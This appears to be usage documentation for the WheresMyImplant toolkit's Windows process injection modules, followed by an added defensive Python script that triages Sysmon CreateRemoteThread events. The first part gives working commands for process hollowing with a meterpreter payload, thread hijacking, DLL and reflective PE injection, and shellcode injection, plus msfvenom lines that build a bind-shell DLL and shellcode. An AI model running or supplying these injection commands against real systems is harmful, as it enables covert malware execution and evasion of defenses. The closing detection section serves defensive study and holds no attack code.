Process Injection Modules
Note: Providing a zero length or blank string for the process ID will cause the method to inject into the current process
HollowProcess
This technique starts a process in a suspended state, overwrites the suspended process's memory image with a new PE, and then resumes execution so the replacement PE runs under the original process name.
[WheresMyImplant.Injection]::HollowProcess("notepad.exe", "meterpreter.exe")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,HollowProcess notepad.exe,meterpreter.exe
HijackThread
This technique suspends the main thread of a process, alters the thread context so that the instruction pointer register points at our shellcode, and resumes the thread. After the shellcode has finished executing, the original execution context is restored and the process resumes as normal.
[WheresMyImplant.Injection]::HijackThread("495", $shellcode)
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,HijackThread 495,<shellcode>
LoadDll
This technique creates a new thread in a process that calls LoadLibrary from kernel32, loading the DLL from disk into the remote process. Note: This is not reflective DLL injection; that is covered in InjectPE.
msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
[WheresMyImplant.Injection]::LoadDll("495", "C:\evil.dll")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,LoadDll "495","C:\evil.dll"
InjectPE
This technique reflectively loads a PE into a process by allocating space in the process, adjusting the PE's relocations and import offsets, and starting execution of the PE in a new thread.
[WheresMyImplant.Injection]::InjectPE("495", "C:\evil.exe", "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPE "495","C:\evil.dll"
InjectPEString
This technique reflectively loads a PE into a process by allocating space in the process, adjusting the PE's relocations and import offsets, and starting execution of the PE in a new thread. The implementation reads the PE from a base64 encoded string containing its bytes.
[WheresMyImplant.Injection]::InjectPEString("495", $base64PE, "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPEString "495","<peString>","arg1, arg2"
InjectPEStringWMIFS
This technique reflectively loads a PE into a process by allocating space in the process, adjusting the PE's relocations and import offsets, and starting execution of the PE in a new thread. The implementation reads the PE from a base64 encoded string stored in WMI.
[WheresMyImplant.Injection]::InjectPEStringWMIFS("495", "WMIClassName", "FileName", "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPEStringWMIFS "495","WMIClassName","FileName","arg1, arg2"
InjectPEStringWMIFSWMIFSRemote
This technique reflectively loads a PE into a process by allocating space in the process, adjusting the PE's relocations and import offsets, and starting execution of the PE in a new thread. The implementation reads the PE from a base64 encoded string stored in a remote WMI instance, authenticating with the supplied username and password.
[WheresMyImplant.Injection]::InjectPEStringWMIFSWMIFSRemote("495", "WMIClassName", "Username", "Password", "Filename", "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPEStringWMIFSWMIFSRemote "495","WMIClassName","Username","Password","Filename","arg1, arg2"
InjectShellCode
This technique allocates space in a process, writes the shellcode bytes into it, and creates a new thread on the allocated space, executing the shellcode. Note: The shellcode is read as a base64 encoded string; an empty process ID injects into the current process.
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe | base64
[WheresMyImplant.Injection]::InjectShellCode("", $shellcode)
[WheresMyImplant.Injection]::InjectShellCode("495", $shellcode)
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectShellCode "",<shellcode>
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectShellCode "495",<shellcode>
InjectShellCodeWMIFS
This technique allocates space in a process, writes the shellcode bytes into it, and creates a new thread on the allocated space, executing the shellcode. The implementation reads the shellcode from a base64 encoded string stored in a WMI instance.
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe | base64
[WheresMyImplant.Injection]::InjectShellCodeWMIFS("495", "WMIClassName", "ShellCodeName")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectShellCodeWMIFS "495","WMIClassName","ShellCodeName"
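The LoadDll, InjectPE* and InjectShellCode* modules above all end by creating a thread in the target process, which Sysmon records as Event ID 8 (CreateRemoteThread). The following detection-side triage script is an added example and is not part of the WheresMyImplant wiki or code base; it assumes Sysmon's documented Event ID 8 field names (SourceImage, TargetImage, TargetProcessId, StartAddress, StartModule, StartFunction) and uses constructed sample records rather than real telemetry. It separates the two thread-start shapes these modules produce: a remote thread whose entry point is kernel32!LoadLibrary* (LoadDll) and a remote thread whose start address is not backed by any loaded image (shellcode or a reflectively mapped PE).

```python
"""Triage Sysmon Event ID 8 (CreateRemoteThread) records for the thread-start
patterns produced by CreateRemoteThread-based injection.

Every sample event in SAMPLE_EVENTS is constructed for this example; none of it
is real log data, and the paths and PIDs are placeholders.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Sysmon reports StartModule as "-" (or leaves it empty) when StartAddress does
# not fall inside any loaded image, i.e. the thread starts in unbacked memory
# such as a VirtualAllocEx'd region holding shellcode or a manually mapped PE.
UNRESOLVED = {"", "-"}


@dataclass(frozen=True)
class Finding:
    source_image: str
    target_image: str
    target_pid: str
    label: str


def classify_remote_thread(event: Dict[str, object]) -> Optional[str]:
    """Label one Event ID 8 record, or return None if it looks benign.

    Keys follow the Sysmon EventData field names for Event ID 8.
    """
    start_module = str(event.get("StartModule", "")).strip()
    start_function = str(event.get("StartFunction", "")).strip()

    # Remote thread whose entry point is kernel32!LoadLibrary*: the classic
    # CreateRemoteThread + LoadLibrary DLL injection (the LoadDll module).
    if (start_module.lower().endswith("kernel32.dll")
            and start_function.lower().startswith("loadlibrary")):
        return "remote_thread_loadlibrary"

    # Remote thread starting at an address no on-disk image backs: consistent
    # with shellcode or a reflectively loaded PE (InjectShellCode*, InjectPE*).
    if start_module in UNRESOLVED:
        return "remote_thread_unbacked_memory"

    # Remote thread into a resolved module is common for legitimate software
    # (e.g. a debugger attaching via ntdll!DbgUiRemoteBreakin), so not flagged.
    return None


def triage(events: List[Dict[str, object]]) -> List[Finding]:
    """Run classify_remote_thread over every Event ID 8 record and collect hits."""
    findings: List[Finding] = []
    for ev in events:
        if str(ev.get("EventID")) != "8":
            continue  # ProcessAccess (10), ImageLoad (7) etc. need their own rules
        label = classify_remote_thread(ev)
        if label:
            findings.append(Finding(str(ev["SourceImage"]), str(ev["TargetImage"]),
                                    str(ev["TargetProcessId"]), label))
    return findings


# Constructed sample records (not real telemetry). PID 495 and notepad.exe
# mirror the placeholder values used in the module examples above.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": "8", "SourceImage": r"C:\Users\u\rundotnetdll32.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "TargetProcessId": 495,
     "StartAddress": "0x00007FFD1E2A3C10",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryA"},
    {"EventID": "8", "SourceImage": r"C:\Users\u\rundotnetdll32.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "TargetProcessId": 495,
     "StartAddress": "0x0000020B7A5E0000", "StartModule": "-", "StartFunction": "-"},
    {"EventID": "8", "SourceImage": r"C:\Program Files\Debugger\dbg.exe",
     "TargetImage": r"C:\app\app.exe", "TargetProcessId": 1201,
     "StartAddress": "0x00007FFD1E0B4F30",
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "DbgUiRemoteBreakin"},
    {"EventID": "10", "SourceImage": r"C:\Users\u\rundotnetdll32.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "TargetProcessId": 495,
     "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.label}: {f.source_image} -> {f.target_image} (pid {f.target_pid})")
```

Note the coverage gap this rule leaves: HollowProcess and HijackThread never create a remote thread, so they produce no Event ID 8 at all; their footprint is the cross-process handle open recorded in Event ID 10 (ProcessAccess, with a GrantedAccess mask wide enough for VM_WRITE and THREAD_SET_CONTEXT) followed by a thread resume, which the script above deliberately skips rather than guess at.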